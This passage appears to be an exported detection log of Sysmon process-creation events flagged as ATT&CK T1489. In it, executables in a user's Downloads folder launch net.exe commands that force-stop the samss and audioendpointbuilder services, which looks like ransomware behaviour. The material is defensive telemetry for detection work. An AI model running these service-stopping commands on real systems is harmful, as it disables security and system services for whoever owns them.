MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d1fd-5ec7-0000-001009443b00}\r\nParentProcessId: 201476\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:07.779"",""processGuid"":""{df9fc3d3-d1ff-5ec7-0000-0010057c3b00}"",""processId"":""204716"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d1fd-5ec7-0000-001009443b00}"",""parentProcessId"":""201476"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:40:28.230",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:06.014 +ProcessGuid: {df9fc3d3-d1fe-5ec7-0000-0010cb4c3b00} +ProcessId: 201768 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop 
""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d1fd-5ec7-0000-00109a313b00} +ParentProcessId: 200892 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:06.117466600Z"",""eventRecordID"":""1165"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:06.014\r\nProcessGuid: {df9fc3d3-d1fe-5ec7-0000-0010cb4c3b00}\r\nProcessId: 201768\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d1fd-5ec7-0000-00109a313b00}\r\nParentProcessId: 200892\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:06.014"",""processGuid"":""{df9fc3d3-d1fe-5ec7-0000-0010cb4c3b00}"",""processId"":""201768"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d1fd-5ec7-0000-00109a313b00}"",""parentProcessId"":""200892"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:40:28.222",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:05.808 +ProcessGuid: {df9fc3d3-d1fd-5ec7-0000-001009443b00} +ProcessId: 201476 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe 
+CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900} +ParentProcessId: 5232 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:05.896730100Z"",""eventRecordID"":""1164"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:05.808\r\nProcessGuid: {df9fc3d3-d1fd-5ec7-0000-001009443b00}\r\nProcessId: 201476\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900}\r\nParentProcessId: 5232\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:05.808"",""processGuid"":""{df9fc3d3-d1fd-5ec7-0000-001009443b00}"",""processId"":""201476"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001031791900}"",""parentProcessId"":""5232"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:40:28.209",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:05.462 +ProcessGuid: {df9fc3d3-d1fd-5ec7-0000-00109a313b00} +ProcessId: 200892 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: 
net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900} +ParentProcessId: 5232 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:05.468573000Z"",""eventRecordID"":""1163"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:05.462\r\nProcessGuid: {df9fc3d3-d1fd-5ec7-0000-00109a313b00}\r\nProcessId: 200892\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900}\r\nParentProcessId: 5232\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:05.462"",""processGuid"":""{df9fc3d3-d1fd-5ec7-0000-00109a313b00}"",""processId"":""200892"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001031791900}"",""parentProcessId"":""5232"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:40:11.484",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:58.722 +ProcessGuid: {df9fc3d3-d1f6-5ec7-0000-0010aeda3900} +ProcessId: 183508 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation 
+OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d1f6-5ec7-0000-001033d13900} +ParentProcessId: 182656 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:58.752503600Z"",""eventRecordID"":""1160"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:58.722\r\nProcessGuid: {df9fc3d3-d1f6-5ec7-0000-0010aeda3900}\r\nProcessId: 183508\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d1f6-5ec7-0000-001033d13900}\r\nParentProcessId: 182656\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:58.722"",""processGuid"":""{df9fc3d3-d1f6-5ec7-0000-0010aeda3900}"",""processId"":""183508"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d1f6-5ec7-0000-001033d13900}"",""parentProcessId"":""182656"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:40:11.437",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:58.426 +ProcessGuid: {df9fc3d3-d1f6-5ec7-0000-001074d43900} +ProcessId: 183044 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop 
""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d1f6-5ec7-0000-001000cb3900} +ParentProcessId: 182144 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:58.430889200Z"",""eventRecordID"":""1159"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:58.426\r\nProcessGuid: {df9fc3d3-d1f6-5ec7-0000-001074d43900}\r\nProcessId: 183044\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d1f6-5ec7-0000-001000cb3900}\r\nParentProcessId: 182144\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:58.426"",""processGuid"":""{df9fc3d3-d1f6-5ec7-0000-001074d43900}"",""processId"":""183044"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d1f6-5ec7-0000-001000cb3900}"",""parentProcessId"":""182144"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:40:11.305",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:58.347 +ProcessGuid: {df9fc3d3-d1f6-5ec7-0000-001033d13900} +ProcessId: 182656 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe 
+CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:58.352185600Z"",""eventRecordID"":""1158"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:58.347\r\nProcessGuid: {df9fc3d3-d1f6-5ec7-0000-001033d13900}\r\nProcessId: 182656\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:58.347"",""processGuid"":""{df9fc3d3-d1f6-5ec7-0000-001033d13900}"",""processId"":""182656"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:40:11.122",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:58.102 +ProcessGuid: {df9fc3d3-d1f6-5ec7-0000-001000cb3900} +ProcessId: 182144 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe 
